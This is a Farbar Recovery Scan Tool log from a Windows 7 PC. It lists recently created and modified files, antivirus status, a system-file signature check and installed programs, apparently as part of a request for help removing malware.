2014-10-28 22:22 - 2014-10-28 22:55 - 00000000 ____D () C:\Users\ADH.Heathman-PC\Desktop\FRST64
2014-10-28 22:04 - 2014-10-28 22:55 - 00000000 ____D () C:\FRST
2014-10-27 17:51 - 2014-10-27 17:54 - 120407800 _____ (Microsoft Corporation) C:\Users\ADH.Heathman-PC\Downloads\msert.exe
2014-10-24 18:49 - 2014-10-28 21:21 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-20 12:22 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-20 12:22 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll
2014-10-19 16:51 - 2013-10-01 21:22 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\Drivers\TsUsbFlt.sys
2014-10-19 16:51 - 2013-10-01 21:11 - 00013824 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2014-10-19 16:51 - 2013-10-01 21:08 - 00012800 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2014-10-19 16:51 - 2013-10-01 20:48 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\MsRdpWebAccess.dll
2014-10-19 16:51 - 2013-10-01 20:48 - 00018944 _____ (Microsoft Corporation) C:\windows\system32\wksprtPS.dll
2014-10-19 16:51 - 2013-10-01 20:29 - 00062976 _____ (Microsoft Corporation) C:\windows\system32\tsgqec.dll
2014-10-19 16:51 - 2013-10-01 20:10 - 00044544 _____ (Microsoft Corporation) C:\windows\system32\TsUsbGDCoInstaller.dll
2014-10-19 16:51 - 2013-10-01 19:15 - 01057280 _____ (Microsoft Corporation) C:\windows\system32\rdvidcrl.dll
2014-10-19 16:51 - 2013-10-01 19:14 - 00050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\MsRdpWebAccess.dll
2014-10-19 16:51 - 2013-10-01 19:14 - 00017920 _____ (Microsoft Corporation) C:\windows\SysWOW64\wksprtPS.dll
2014-10-19 16:51 - 2013-10-01 19:08 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\TSWbPrxy.exe
2014-10-19 16:51 - 2013-10-01 19:01 - 00420864 _____ (Microsoft Corporation) C:\windows\system32\wksprt.exe
2014-10-19 16:51 - 2013-10-01 18:58 - 00053248 _____ (Microsoft Corporation) C:\windows\SysWOW64\tsgqec.dll
2014-10-19 16:51 - 2013-10-01 18:31 - 01147392 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe
2014-10-19 16:51 - 2013-10-01 18:08 - 00855552 _____ (Microsoft Corporation) C:\windows\SysWOW64\rdvidcrl.dll
2014-10-19 16:51 - 2013-10-01 17:34 - 01068544 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe
2014-10-19 16:02 - 2014-10-19 16:02 - 00000000 ____D () C:\windows\System32\Tasks\Norton 360
2014-10-19 16:00 - 2014-10-19 16:00 - 00177752 _____ (Symantec Corporation) C:\windows\system32\Drivers\SYMEVENT64x86.SYS
2014-10-19 16:00 - 2014-10-19 16:00 - 00008222 _____ () C:\windows\system32\Drivers\SYMEVENT64x86.CAT
2014-10-19 16:00 - 2014-10-19 16:00 - 00002402 _____ () C:\Users\Public\Desktop\Norton 360.lnk
2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360
2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ____D () C:\Program Files (x86)\Norton 360
2014-10-19 15:56 - 2014-10-19 15:56 - 01021968 _____ (Symantec Corporation) C:\Users\Heathman\Downloads\NortonN360Downloader.exe
2014-10-19 15:49 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\windows\system32\qdvd.dll
2014-10-19 15:49 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\windows\SysWOW64\qdvd.dll
2014-10-19 15:48 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-10-19 15:48 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-10-19 15:48 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-10-19 15:48 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-19 15:48 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-10-19 15:48 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll
2014-10-19 15:48 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-19 15:48 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll
2014-10-19 15:48 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-19 15:48 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-19 15:48 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-19 15:48 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll
2014-10-19 15:48 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2014-10-19 15:48 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2014-10-19 15:48 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-19 15:48 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL
2014-10-19 15:48 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL
2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL
2014-10-19 15:48 - 2014-07-08 17:38 - 00419992 _____ () C:\windows\system32\locale.nls
2014-10-19 15:48 - 2014-07-08 17:30 - 00419992 _____ () C:\windows\SysWOW64\locale.nls
2014-10-19 15:48 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll
2014-10-19 15:48 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-19 15:47 - 2014-10-19 15:47 - 00896048 _____ () C:\Users\ADH.Heathman-PC\Downloads\Norton_Removal_Tool.exe
2014-10-19 15:45 - 2014-09-20 00:18 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-19 15:45 - 2014-09-20 00:17 - 02236928 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-19 15:45 - 2014-09-20 00:17 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 19280896 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00526336 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-19 15:45 - 2014-09-20 00:16 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-19 15:45 - 2014-09-20 00:15 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-19 15:45 - 2014-09-20 00:15 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-19 15:45 - 2014-09-20 00:15 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 14368768 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 13757952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 01762816 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00391168 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00039936 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-19 15:45 - 2014-09-19 22:57 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-19 15:45 - 2014-09-19 22:56 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-19 15:45 - 2014-09-19 22:56 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-19 15:45 - 2014-09-19 22:56 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-19 15:45 - 2014-09-19 22:38 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-19 15:45 - 2014-09-19 22:33 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-19 15:45 - 2014-09-19 21:43 - 00089600 _____ (Microsoft Corporation) C:\windows\system32\RegisterIEPKEYs.exe
2014-10-19 15:45 - 2014-09-19 21:35 - 00071680 _____ (Microsoft Corporation) C:\windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-19 15:45 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-19 15:45 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll
2014-10-17 12:57 - 2014-10-17 12:58 - 127289600 _____ (Microsoft Corporation) C:\Users\Heathman\Downloads\msert (1).exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 22:39 - 2012-10-13 15:28 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\MotoCast
2014-10-28 22:38 - 2014-05-17 20:38 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-28 22:38 - 2012-11-01 06:39 - 00000000 ____D () C:\Users\Heathman\.gstreamer-0.10
2014-10-28 22:27 - 2013-10-21 09:40 - 00003950 _____ () C:\windows\System32\Tasks\User_Feed_Synchronization-{33596801-E64F-4DCE-B487-9E9DBE9DB15C}
2014-10-28 22:24 - 2012-04-01 20:34 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-10-28 22:23 - 2012-10-11 20:07 - 00000920 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job
2014-10-28 22:05 - 2012-03-24 16:17 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-28 22:03 - 2009-07-14 00:13 - 00006214 _____ () C:\windows\system32\PerfStringBackup.INI
2014-10-28 21:48 - 2014-05-17 17:12 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-28 21:20 - 2012-10-13 15:30 - 00000000 ____D () C:\Temp
2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-28 21:08 - 2012-03-24 16:01 - 01373568 _____ () C:\windows\WindowsUpdate.log
2014-10-28 21:04 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-28 21:04 - 2009-07-13 23:51 - 00072697 _____ () C:\windows\setupact.log
2014-10-28 20:52 - 2010-11-20 22:47 - 03730694 _____ () C:\windows\PFRO.log
2014-10-27 18:16 - 2014-09-03 19:53 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-10-27 06:23 - 2012-10-11 20:07 - 00000868 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job
2014-10-25 14:00 - 2012-03-24 16:17 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-25 14:00 - 2012-03-24 16:17 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-25 14:00 - 2012-03-24 16:17 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-24 18:27 - 2012-08-11 10:41 - 00000000 ____D () C:\Users\Heathman\AppData\Local\CrashDumps
2014-10-24 18:19 - 2012-11-06 22:39 - 00000000 ____D () C:\Users\Heathman\Documents\My Kindle Content
2014-10-22 06:18 - 2012-10-11 20:07 - 00003896 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA
2014-10-22 06:18 - 2012-10-11 20:07 - 00003500 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core
2014-10-21 11:15 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\rescache
2014-10-21 10:22 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF
2014-10-20 19:34 - 2014-05-17 17:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-20 19:34 - 2013-07-29 17:47 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 16:58 - 2009-07-13 23:45 - 00434912 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-19 16:56 - 2014-05-06 06:24 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-10-19 16:54 - 2012-03-24 14:10 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-19 16:48 - 2013-07-21 08:54 - 00000000 ____D () C:\windows\system32\MRT
2014-10-19 16:44 - 2012-03-28 19:04 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-19 16:08 - 2013-07-23 18:36 - 00000000 ____D () C:\Users\Heathman\Desktop\Norton
2014-10-19 16:08 - 2012-03-24 16:16 - 00000000 ____D () C:\ProgramData\Norton
2014-10-19 16:08 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2014-10-19 16:00 - 2014-06-17 20:27 - 00003206 _____ () C:\windows\System32\Tasks\Norton WSC Integration
2014-10-19 16:00 - 2014-06-17 20:27 - 00000000 ____D () C:\Program Files\Common Files\Symantec Shared
2014-10-19 15:57 - 2014-06-17 20:14 - 00038912 ___SH () C:\Users\Heathman\Desktop\Thumbs.db
2014-10-19 15:56 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Public\Downloads\Norton
2014-10-19 15:48 - 2013-12-18 07:40 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\CrashDumps
2014-10-19 15:44 - 2013-12-18 07:38 - 00000000 ____D () C:\Users\ADH.Heathman-PC
2014-10-19 15:39 - 2012-03-25 20:16 - 00002030 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-10-19 15:39 - 2011-11-21 23:32 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-10-19 15:38 - 2012-05-16 00:06 - 00000000 ____D () C:\Users\UpdatusUser.Heathman-PC
2014-10-19 15:36 - 2012-03-24 12:43 - 00000000 ____D () C:\Users\Heathman
2014-10-19 15:33 - 2014-09-03 19:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-10-19 15:33 - 2014-06-17 20:25 - 00000000 ____D () C:\windows\system32\Drivers\N360x64
2014-10-19 15:33 - 2012-04-01 19:39 - 00000000 ____D () C:\Users\Guest
2014-10-19 15:33 - 2012-03-24 16:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2014-10-19 15:33 - 2011-11-21 23:31 - 00000000 ____D () C:\windows\SysWOW64\Macromed
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\SysWOW64\Dism
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\Dism
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\PolicyDefinitions
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\AppCompat
2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared
2014-10-19 15:20 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\registration
2014-10-19 15:16 - 2012-06-27 20:07 - 00000000 ____D () C:\Users\Heathman\Documents\TomTom
2014-10-19 14:56 - 2012-03-25 20:11 - 00000000 ____D () C:\Users\Heathman\AppData\Local\Adobe
2014-10-03 06:45 - 2014-02-18 21:09 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\Adobe
2014-10-01 11:11 - 2014-05-17 17:12 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-01 11:11 - 2014-05-17 17:12 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-01 11:11 - 2013-07-29 17:47 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys

Some content of TEMP:
====================
C:\Users\Heathman\AppData\Local\Temp\ose00000.exe
C:\Users\Heathman\AppData\Local\Temp\sqlite-3.6.20-sqlitejdbc.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-28 21:55

==================== End Of Log ============================

Addition.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-10-2014 01
Ran by ADH at 2014-10-28 22:55:31
Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton 360 Premier Edition (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton 360 Premier Edition (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton 360 Premier Edition (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Amazing Adventures The Forgotten Dynasty (HKLM-x32\...\Amazing Adventures The Forgotten Dynasty) (Version:  - PopCap Games)
Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
Big City Adventure San Francisco (HKLM-x32\...\Big City Adventure San Francisco_is1) (Version:  - Best Buy)
Big City Adventure Sydney (HKLM-x32\...\Big City Adventure Sydney_is1) (Version:  - Best Buy)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Castle - Never Judge a Book by Its Cover (HKLM-x32\...\Castle - Never Judge a Book by Its Cover) (Version: 1.0 - GameMill Entertainment)
ContentHD (x32 Version: 1.00.0002 - Corel Corporation) Hidden
Contents (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Corel Digital Studio SE (HKLM-x32\...\_{E185BD5C-0E10-479F-AF44-63D3A068446A}) (Version: 1.5.10.332 - Corel Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DeviceIO (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
DFPro (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Escape The Emerald Star (HKLM-x32\...\Escape The Emerald Star) (Version:  - PopCap Games)
Escape Whisper Valley (HKLM-x32\...\Escape Whisper Valley) (Version:  - PopCap Games)
FATE - The Traitor Soul (x32 Version: 2.2.0.95 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hoyle Card Games Classic (HKLM-x32\...\Hoyle Card Games Classic) (Version:  - )
Hoyle Casino Classic (HKLM-x32\...\Hoyle Casino Classic) (Version:  - )
ICA (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
Intel PROSet Wireless (Version:  - ) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2430 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{3C41721F-AF0F-4086-AA1C-4C7F29076228}) (Version: 14.01.1000 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)
Intel® WiDi (HKLM-x32\...\{7257132D-7F65-41E6-A90F-43BF6099461A}) (Version: 2.1.42.0 - Intel Corporation)
Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version:  - )
IPM_OEM (x32 Version: 1.53 - Corel Corporation) Hidden
ISCOM (x32 Version: 1.5.10.332 - Corel Corporation) Hidden
iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)
Java Auto Updater (x32 Version: 2.0.4.1 - Sun Microsystems, Inc.) Hidden
Java 6 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216025FF}) (Version: 6.0.250 - Oracle)
Jewel Quest Mysteries Curse of the Emerald Tear (HKLM-x32\...\{246BBF3E-3CB6-4269-9728-904C54CC1D4A}) (Version: 1.00.0000 - Valusoft)
Jewel Quest Mysteries The Seventh Gate (HKLM-x32\...\{BD40253B-EFE2-4610-9AA5-F3317DB970BE}) (Version: 1.00.0000 - Valusoft)
